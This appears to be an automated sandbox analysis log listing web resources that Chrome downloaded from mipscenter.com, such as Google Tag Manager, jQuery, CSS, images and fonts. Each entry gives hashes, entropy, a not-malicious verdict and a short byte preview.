                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2587)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):297934
                                                                                                                                                                                                                                        Entropy (8bit):5.5746083776090565
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:622474943C15887D414A9FFDD6BA4755
                                                                                                                                                                                                                                        SHA1:70BCF92D4C1D62DDB8AF43B494355F778DA734A3
                                                                                                                                                                                                                                        SHA-256:36D254918A91749BA8643D834143384C0CAD6EF8666A16FA2555627C4E34E9BF
                                                                                                                                                                                                                                        SHA-512:40B762700C730F3AD865CEA12B6EE8FEF6B0BA88C4C4719BAD538E6E0573933DD559A3A2169CB93B5A5B02A9F5AED724471A7E0A6F604EC70144940046AE20CE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://www.googletagmanager.com/gtm.js?id=GTM-KW6HS87Z
                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"5",. . "macros":[{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__e"},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__f","vtp_component":"URL"},{"function":"__e"}],. "tags":[{"function":"__awct","metadata":["map"],"once_per_event":true,"vtp_enableNewCustomerReporting":false,"vtp_enableConversionLinker":true,"vtp_enableProductReporting":false,"vtp_enableEnhancedConversion":false,"vtp_conversionCooki
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 1536 x 624, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):67027
                                                                                                                                                                                                                                        Entropy (8bit):7.641629168917081
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:9C99552857E73CC67E91636FFEE784B3
                                                                                                                                                                                                                                        SHA1:8801A7F7E62FE00044B23ED97FFE75E554A2E900
                                                                                                                                                                                                                                        SHA-256:935AD0A0C56A9ED4C72887FAD3816A8B0F5B9A3273CFD75925E755EC9D5748B6
                                                                                                                                                                                                                                        SHA-512:C19845915F529C153FEC2FFABB397E3370EB403AD10C7D5734810429752D97837DBB519E9BBD30143D8274599EDB30779FE892CA3240A1BA9B0066297B855C41
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/uploads/2021/03/content-bg-2-1536x624.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.......p.....x]Z....1PLTE..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................*7.....IDATx.....dWz...wq.@UfD42.=.""#.*..*W..3...d..r.T.x.j....t.m5 .j...Do..l..Z...o.....Y.s.{.=...{?.2...tF.......:..8...w..H\..*{W%...U#.zx5.I_-...~.w~._..^..w..>..>v.G..=z.^g.u~~~.n.....v..n...\\....]......w..k2.L...t6......r.r..w9.K.....{7..z...)..w........~...3.l0...q..k2.L.S....x.....{...w...Z-..#xC...w'............7.......Q....sy....$.F..P..v..n..j.....k/....H
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 640x480, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):28206
                                                                                                                                                                                                                                        Entropy (8bit):7.992479904787041
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:664EA34568BC7D76405702D0F8A35666
                                                                                                                                                                                                                                        SHA1:C574CB9BCAEA44D491B5C24769AA57EA8A5F0AA6
                                                                                                                                                                                                                                        SHA-256:011E453CEF3328D01A10333C601CBC0E846B91E3F0D117C3C18FB71742637041
                                                                                                                                                                                                                                        SHA-512:20E0FFBDBD7033A9D792043DDC81272F78E2B0D6538E3A117C96039C9261E7F768DEC804E5AA6A74DB4D44122598BB37C3F1AFEB027C390EF0532281702480CB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:RIFF&n..WEBPVP8 .n.......*....>m2.H$".!%t.x...gn...3.'.U...|..km.o..y..y].{.7.8.....zM........?8/R..w.?..z..........o./.~p........#..eO..K...g._.._....!..._......../...~._i.U....d.e.{..w.?J.i........}.|'.......?..s.5.f...O...~........E...........6}..M...O...o.?..................?...kA..h4....A..h4....A..h4....A..h4....A..h4....A..h4....A..h4....A.......v.P.qg.=.Qn...8...yH|.N)r$.X.,...m".G.Kh:..M@.&...6..~..'f.7.^_J.E%..+[...s.H\..Y..s.7yF.z.F.Y.D.Ts.RC..VAIe...Ij}.......E?.,.d:..H..f$!..k.J.>...<..,.......6YZ.....a..]\...S...g...;fe%s?n)%b.O...........*.o...?. ...TV..Ab..Z..;L6$.V...A.Vl...+.....jW...3.+S.{.r/Y.vh.}...!..Tay...=.W_..:.|[.5w...>. .j..qhWg..)..jm.N<^..>g-u.&.n'...I.B:?..v\$..(.S._..-.d.&.(..P..m...'r..X..7 Vk..0,.N.;.M./W^..B\b.?..[^.v5jP.....":o}.L>..y......d....?..f.....Y...5;..{>/.O.1.$G.3.'........'....v...j.E...d.m..s.D.N.?.e. D/..D..9$.o)..*..EH..Rv.....s....... Bzb.......5.....xi.0..'..N../V...R..q.y...2......._.P8Jl..}
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (17711)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):150985
                                                                                                                                                                                                                                        Entropy (8bit):5.08527347135209
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:08E397D75895CA5D61BA180D8FC7BAD9
                                                                                                                                                                                                                                        SHA1:75581D3444C50A97DEA345885619356A7F0ACB08
                                                                                                                                                                                                                                        SHA-256:2353D9485C58ADD9BD4EC6193D1310016AD3B5791042B7B33D33B10ADD6D9935
                                                                                                                                                                                                                                        SHA-512:062BDA33073F7DEF5936B46B1D13D7115B13C9647CE123852AEB7446C4C36688171E7202F919246F9181C2B9C9CDC6E5F00A553B59B2168489B02DB4C5B95423
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_f4f041ab9c04771db09b5b5afee674e4.js
                                                                                                                                                                                                                                        Preview:(function webpackUniversalModuleDefinition(root,factory){if(typeof exports==='object'&&typeof module==='object').module.exports=factory(require("jquery"));else if(typeof define==='function'&&define.amd).define(["jquery"],factory);else{var a=typeof exports==='object'?factory(require("jquery")):factory(root["jQuery"]);for(var i in a)(typeof exports==='object'?exports:root)[i]=a[i];}})(window,function(__WEBPACK_EXTERNAL_MODULE_jquery__){return(function(modules){var installedModules={};function __webpack_require__(moduleId){if(installedModules[moduleId]){return installedModules[moduleId].exports;}.var module=installedModules[moduleId]={i:moduleId,l:false,exports:{}};modules[moduleId].call(module.exports,module,module.exports,__webpack_require__);module.l=true;return module.exports;}.__webpack_require__.m=modules;__webpack_require__.c=installedModules;__webpack_require__.d=function(exports,name,getter){if(!__webpack_require__.o(exports,name)){Object.defineProperty(exports,name,{enumerable:t
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (31104), with CRLF, LF line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):31399
                                                                                                                                                                                                                                        Entropy (8bit):4.90975769386718
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:2228B4AAA8443CE153C1C4A3B793D911
                                                                                                                                                                                                                                        SHA1:4C44D25CA29E4A50FE299F740156999C22DDBB8B
                                                                                                                                                                                                                                        SHA-256:1A62D234A1F39B534A6FBE05099A798A4701818CC22BA62799B611A014D46546
                                                                                                                                                                                                                                        SHA-512:ED9C20B0399D127C77566B3ABD08B118A6CD786187A52BB12C0325DC910B425061B7C161B1A0D83CBB1D2B6951B563E61E253E439EC0533EF34AC62EEC935810
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/css/autoptimize_single_54db845a8c1c9c5a52029d24e0141f76.css
                                                                                                                                                                                                                                        Preview:/*!.. * Practis Responsive Grid.. * All classes are prefixed with "prg-".. * Bootstrap Grid v4.2.1 (https://getbootstrap.com/).. * Copyright 2011-2018 The Bootstrap Authors.. * Copyright 2011-2018 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. */.html{box-sizing:border-box;-ms-overflow-style:scrollbar}*,*:before,*:after{box-sizing:inherit}.prg-container{width:100%;padding-right:15px;padding-left:15px;margin-right:auto;margin-left:auto}@media (min-width:576px){.prg-container{max-width:540px}}@media (min-width:768px){.prg-container{max-width:720px}}@media (min-width:992px){.prg-container{max-width:960px}}@media (min-width:1200px){.prg-container{max-width:1140px}}.prg-container-fluid{width:100%;padding-right:15px;padding-left:15px;margin-right:auto;margin-left:auto}.prg-row{display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;margin-right:-15px;margin-left:-15px}.prg-no-gutters{margin-right:0;margin-left:0}.prg-no-gutters>.prg-
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=4], baseline, precision 8, 360x165, components 3
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):16278
                                                                                                                                                                                                                                        Entropy (8bit):6.127496652431708
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:249EE70BABE23F6D6DF120D51E4E49EA
                                                                                                                                                                                                                                        SHA1:1E1D8C104F0DD080ADB12DDF1EED879E7B681F68
                                                                                                                                                                                                                                        SHA-256:7D000F1226497E635459437508A08AC1FED7C35A96278CB2441EC21A37E56E9C
                                                                                                                                                                                                                                        SHA-512:CFCCD54394425C126A6131FFF1F8E91081304B39BB8B38CD3DD1DD8738B74BED8CE17C7ED3467644F42F92BC0E6ACF64D1AA52754216D8E68B9C88B03A71B32A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/uploads/2021/02/UFE-360x165.jpg
                                                                                                                                                                                                                                        Preview:......JFIF.....`.`......Exif..MM.*.......;.........J.i.........Z....... ...............>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):26358
                                                                                                                                                                                                                                        Entropy (8bit):7.934665984851681
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:B95AE406CE2FE0C6B09263F71413814D
                                                                                                                                                                                                                                        SHA1:F6412E84FF420897DD48A19DE22382CA2A11D4FF
                                                                                                                                                                                                                                        SHA-256:D1FFAB9222FCF38B335E0825C3CD9AC4B189B234B22CF40B21812911D3F9F0F0
                                                                                                                                                                                                                                        SHA-512:179F7C7209E51DB8E0FAF5553E21A424FA672B3F4C95CA2321A82FF9A2761CBC11720387F2ADC682EC03CA31D5C9FE1DCF74507FAA24C1E0332C2E8C678D917D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://i0.wp.com/mipscenter.com/wp-content/uploads/2021/03/favicon.png?resize=300%2C300&ssl=1
                                                                                                                                                                                                                                        Preview:RIFF.f..WEBPVP8L.f../+.J.M8l.F.`%;{.{./xf.. .......|...j...j...m.P.y3....A..7..).....i.E...9.k,.......O..'..n.8..>..9.w<....Y7...h.....>z..e....c..=.m..Vw..:...ULY...L..]MAIb....e.....2..*..n.>.]..Y.}@l.vU...c?..I.n.....S.}.;.J.L.....[...|.....#.F......G(.H..=K.)#....~6K.H.....E...<....l..O.7@....3........u._......5.*.[..6lz.C......9...?........5.9.!X......{b....?Iz.^l.v$[..6%fo.m.a?.....=a......1....gX..'8....br.s.H0.I5...~.P...MB...`/...0..;..x..N......0..*w.]|M}D.H..n.z./..XK...~R..~.M....4J.z...Hd.>..SI....J..:...>[..$.D}.....@...A..}....T...L......X...x~...j.9.O....w....?(.....7....\*..[!qV.X.....1.).......k...j..PV.G.w.....q8.k..x.7...l.i.4o.Y...P.n.>7>.S.....[Y......6"...J..E.9...mP.E.l.......i.. X3....!.}EH.......q....9w.....Z...-...7..3.O....W.Y..`i'.....v.w.].7?..[.G9.5.`r.(....&..../n.B......q1.b.?..z.y!I}.u.......9.....9p.X\.s`{zg....p.....!.~|...R.<....P..4v.Y:....k.k..|..Cyc.!..Q..(...........e...Ge...w.....+=X<~.c[......4[.6.B..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:JPEG image data, progressive, precision 8, 1320x416, components 3
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):54737
                                                                                                                                                                                                                                        Entropy (8bit):7.981283582515285
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:FF5298DAA9097DF6822FDEAF92BB27C4
                                                                                                                                                                                                                                        SHA1:76B2CBB9D2AE2EF7BA30309BB80F119B820BAB0D
                                                                                                                                                                                                                                        SHA-256:DB166A2FCBE1C9DBAF57BCF45C8AB52CC393EBF775F761865E5DBA63AF1E1A4F
                                                                                                                                                                                                                                        SHA-512:1CDD267716E5DA29D844BEAB18BFA26F437782D6EEE47D273F1E827AE07B519EA14D55089A4A44D4722329BAEDC48E48BBEEA611B281E0E48C2249A4831EE6CB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/uploads/2021/02/new-services.jpg
                                                                                                                                                                                                                                        Preview:...................................................'!..%..."."%()+,+. /3/*2'*+*...........*...**************************************************........(.."..........4.................................................................Eb.z..7...h.c.|....9.Y.U.(.6..Mh.{.R..4|{.u[...G#Z.-..l.....wdXr..i......?........oK..s...=J../..ki...IC........M.......t."....dT./n.5d...*.l.*...G[.....w.1.TY..&..|.\{I8..J..fx...jy..\....s..}m.B.!1..^-........T .."4nU.)./3.l.m...+..N...>[.J.3/.PE....B..#B)..9...R5R.....j/_.<..s..M...+Z.<..j.U.@.@P ...H@..H...........m#Qf.........r....W_1...B..kHu.8:..g......'..R...#....7..\.PM....VY....T8]...yT......w|....4t/gzv....<..1.!...OK...=..'....rof.Z..D.S..K.+06.T.U...|..+9.mc.m....W.Z.>.;:..o.WY..<...d.T...t.........e......5.....p...4`F....z<.:p.~g..9.q.hgvp>......:.z..kV..D%.$mD9X....dk....W.gof..sn..!Z...>NV.Uj.!.........T...*....P@A....+WuKE\j66.>{......K.....Z3`.........,..-..R.|....#e...X...t.o7..R...z$G.wbH..Y.1.}.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 15552, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):15552
                                                                                                                                                                                                                                        Entropy (8bit):7.983966851275127
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:285467176F7FE6BB6A9C6873B3DAD2CC
                                                                                                                                                                                                                                        SHA1:EA04E4FF5142DDD69307C183DEF721A160E0A64E
                                                                                                                                                                                                                                        SHA-256:5A8C1E7681318CAA29E9F44E8A6E271F6A4067A2703E9916DFD4FE9099241DB7
                                                                                                                                                                                                                                        SHA-512:5F9BB763406EA8CE978EC675BD51A0263E9547021EA71188DBD62F0212EB00C1421B750D3B94550B50425BEBFF5F881C41299F6A33BBFA12FB1FF18C12BC7FF1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
                                                                                                                                                                                                                                        Preview:wOF2......<...........<Z.........................d..z..J.`..L.\..<.....<.....^...x.6.$..6. .... ..S..}%.......|....x..[j.E...d..-A...]=sjf$X.o.5......V....i?}.\...;...V......5..mO=,[.B..d'..=..M...q...8..U'..N..G...[..8....Jp..xP...'.?....}.-.1F.C.....%z..#...Q...~.~..3.............r.Xk..v.*.7t.+bw...f..b...q.W..'E.....O..a..HI.....Y.B..i.K.0.:.d.E.Lw....Q..~.6.}B...bT.F.,<./....Qu....|...H....Fk.*-..H..p4.$......{.2.....".T'..........Va.6+.9uv....RW..U$8...p...........H5...B..N..V...{.1....5}p.q6..T...U.P.N...U...!.w..?..mI..8q.}.... >.Z.K.....tq..}.><Ok..w.. ..v....W...{....o...."+#+,..vdt...p.WKK:.p1...3`. 3.......Q.].V.$}.......:.S..bb!I...c.of.2uq.n.MaJ..Cf.......w.$.9C...sj.=...=.Z7...h.w M.D..A.t.....]..GVpL...U(.+.)m..e)..H.}i.o.L...S.r..m..Ko....i..M..J..84.=............S..@......Z.V.E..b...0.....@h>...."$.?....../..?.....?.J.a,..|..d...|`.m5..b..LWc...L...?.G.].i...Q..1.:..LJV.J...bU.2.:\.kt.......t.....k....B..i.z+...........A.....
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):87553
                                                                                                                                                                                                                                        Entropy (8bit):5.262620498676155
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:826EB77E86B02AB7724FE3D0141FF87C
                                                                                                                                                                                                                                        SHA1:79CD3587D565AFE290076A8D36C31C305A573D18
                                                                                                                                                                                                                                        SHA-256:CB6F2D32C49D1C2B25E9FFC9AAAFA3F83075346C01BCD4AE6EB187392A4292CF
                                                                                                                                                                                                                                        SHA-512:FC79FDB76763025DC39FAC045A215FF155EF2F492A0E9640079D6F089FA6218AF2B3AB7C6EAF636827DEE9294E6939A95AB24554E870C976679C25567AD6374C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-includes/js/jquery/jquery.min.js
                                                                                                                                                                                                                                        Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3391)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):33644
                                                                                                                                                                                                                                        Entropy (8bit):5.643793688193748
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:C45985CB0F677108ECCC94FE4300DED9
                                                                                                                                                                                                                                        SHA1:D19767FF3AF5E1FF807BE31EF61A2173BA835C4E
                                                                                                                                                                                                                                        SHA-256:6AC8FEEEC004786EBBCB36F3E4D2D8A9C1C6406BBB30FD1EB50E3232BB9D1C41
                                                                                                                                                                                                                                        SHA-512:DE5D69DFE59202533FEF47273AA3737EFF60CD9205E3DB21999AE184490F504E8B1CA160D1010CF53051A94A097A9114C09BF4E8094E9F923BF36E6E1CC85CDD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://www.youtube.com/s/player/8a8ac953/player_ias.vflset/en_US/embed.js
                                                                                                                                                                                                                                        Preview:(function(g){var window=this;'use strict';var $FU=function(K){K.mutedAutoplay=!1;K.endSeconds=NaN;K.limitedPlaybackDurationInSeconds=NaN;g.g9(K)},dFP=function(){return{B:"svg",.Z:{height:"100%",version:"1.1",viewBox:"0 0 110 26",width:"100%"},K:[{B:"path",c9:!0,D:"ytp-svg-fill",Z:{d:"M 16.68,.99 C 13.55,1.03 7.02,1.16 4.99,1.68 c -1.49,.4 -2.59,1.6 -2.99,3 -0.69,2.7 -0.68,8.31 -0.68,8.31 0,0 -0.01,5.61 .68,8.31 .39,1.5 1.59,2.6 2.99,3 2.69,.7 13.40,.68 13.40,.68 0,0 10.70,.01 13.40,-0.68 1.5,-0.4 2.59,-1.6 2.99,-3 .69,-2.7 .68,-8.31 .68,-8.31 0,0 .11,-5.61 -0.68,-8.31 -0.4,-1.5 -1.59,-2.6 -2.99,-3 C 29.11,.98 18.40,.99 18.40,.99 c 0,0 -0.67,-0.01 -1.71,0 z m 72.21,.90 0,21.28 2.78,0 .31,-1.37 .09,0 c .3,.5 .71,.88 1.21,1.18 .5,.3 1.08,.40 1.68,.40 1.1,0 1.99,-0.49 2.49,-1.59 .5,-1.1 .81,-2.70 .81,-4.90 l 0,-2.40 c 0,-1.6 -0.11,-2.90 -0.31,-3.90 -0.2,-0.89 -0.5,-1.59 -1,-2.09 -0.5,-0.4 -1.10,-0.59 -1.90,-0.59 -0.59,0 -1.18,.19 -1.68,.49 -0.49,.3 -1.01,.80 -1.21,1.40 l 0,-7.90 -3.28,0 z
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1987
                                                                                                                                                                                                                                        Entropy (8bit):7.895046085537746
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:5B50DF56342C2689C8966285D132139B
                                                                                                                                                                                                                                        SHA1:7BDE772ECFF75D08B7E2A73CF2615345FBC39B29
                                                                                                                                                                                                                                        SHA-256:C4D6076BB36FDCD24FDC9CFCDFCB79F7E641E3EBAEAF3C23EBD487C8A9127FD8
                                                                                                                                                                                                                                        SHA-512:A7A140F3C04AD7D7803061644B28B62755E86B0C961063A819841A167B23F0F5C21CD24388B7556FD166D0992F026E6BA6D70EE28CE96934A1A7361E99CA5C44
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.PNG........IHDR... ... .....szz.....IDATx..k.T.......3....,,(..-....*....\V..) .....j". ..,.P.M.j...... .Tp..J*..mu].,......93g.s.y...$.Y.,.|.O6...........=X.........F...o.?v.......W6|{...nT3.....K......[.oQ../...y.............a..;.......7...]..x~....6.r.>.?..~u.....~G...J5m...lj.......E.J..Ced.a...$F0w.u4..........~xo;k.OE..V..k.._....5.4..$.k.1x..*RE..jRI.q>..xo...g',ClQ......c.`|.(*Kj.FJ.F...L$....I.Y..G..k.E..x......U8.gn..e...!...h#.H...@.'...A......r.....1/....)a..:.#.$B...GP..'.......@.....n".#=......[H....2..\&.U.".....2..R..5.PH........z...WI0...r.k.^..\[we!.=.2..{...q........7y2..r].p...Gf.)2.^].s........[.....V.@.q...1....ws.Lk..;.+dN.HK.....9...6:......\.9.`._....D..j<VV....P8...l.}.......0..0c'(c......U[...[}.".g..dP.s....v_)WL.AJ..T}.....Q..-.+...?..v.4.....-.....V..H..h..d....4.2...K.}..\.o.H......k6..\......R..u...d>k_(.S.b......G..'.uh&?.Z..e.0.*../..n....`..#...Jji.@.l.s..\....GE..\c.\..7.s....W7I7H^.8.7..3.J7.c)..\Y..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 3200 x 200, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):10868
                                                                                                                                                                                                                                        Entropy (8bit):7.970266875663408
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:637F9774739B16F7653274758DA165C6
                                                                                                                                                                                                                                        SHA1:4805B0912176FE428C7E0D2DBF079FF0F0227265
                                                                                                                                                                                                                                        SHA-256:353514D02CB94D7173561B3B3B024996172598C35C3C1C196FBD5643948D138C
                                                                                                                                                                                                                                        SHA-512:DFDD8164797B1E6286E874C7F4A560CF710901CC50EC556B9527785330760B2AE935132CC82595BA622186480F84FE9E84A0F2173E1F1EFA20C3315EDF664979
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.PNG........IHDR...............?....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...`PLTEC.WC.XN(fN(eN'fN'eV.pU.pV/p^5{^6{sG.rG.sH.rH.sG.rH.rG.V.osH.U.o_5{M(eM(fM'eV/oU/pzN.zM.yN.yM.D.WI+"/..).IDATx...v.8....c.M'.97S.x..<k.U..l..6..+-/..@..L...J)EJ*...Y.u...%..i$...E0.../.v.`...._...6......].L........=.B(..].m.m..XQ.q\H..Rf.F.)aEmv.om.....Y..M...ncJG..)......L.u..o.f.B..K_...H.3...o.fZB.iy....K......0.sTO.(..v=.0s..p..%..~..g.o.F..g..?.....)*..u..w..6..b..\y.57...i.h1E.L.S\...3...R...:.R..z...v.xi..r@..{=..r.g.[..y......{.r.7K...s.../..#...C/wy...A..m...._..A..Z;.]..M.m"2.}...9{.....+N....{=..V..n?.R.`./z..c...._.......k?....(.8.'.P*a..V.`..[$..;B..S.[.2\.fE.w.zn.I...d..]...........1v..>mHy....;IB.6.H.P...v.<..B?..J..Bz..E........J...,.%/....|lw...$^ht...........+.%...[...u. .......>.e-d.6..=.....qHy.._.4-.....w~.z...S.K.....Q.$.8.XZ`..E.E8.X.......}i$.u.E...(1..c...+.@Vd-.F.w.I..`..!...].........5..s).N.|.[W......<.By...K..XQ.q\H...Pb.[Q.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (543)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):123494
                                                                                                                                                                                                                                        Entropy (8bit):5.58810993857383
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:1C3F2CF84C8AF15776ED116BD20E8B7C
                                                                                                                                                                                                                                        SHA1:E4A4832A5F613A90E6DCE5349A1466ABF21BA3BC
                                                                                                                                                                                                                                        SHA-256:6ABE3282C947B38CFE22C10FE8993582D6C6EB55B9187B1217DCA1D20C98E085
                                                                                                                                                                                                                                        SHA-512:0DDE4501F22BB113B18E635F0C60E7C5CC4732BBAD3CED004B11672632E6C0B621DB4A342476D88CC03AA4737B1C4F2440CBC787AA7DB75570B7FAD3830C8B48
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
